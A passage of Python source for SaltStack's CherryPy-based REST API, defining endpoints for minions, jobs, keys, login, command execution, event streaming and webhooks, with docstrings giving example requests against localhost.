class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns.keys():
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.moves.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.moves.StringIO(pub_key))
tarball.addfile(priv_key_file, six.moves.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.info(saltEvent.tag)
console.debug(saltEvent.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
logger.error('Import of cherrypy.cpstats failed. Possible '
'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
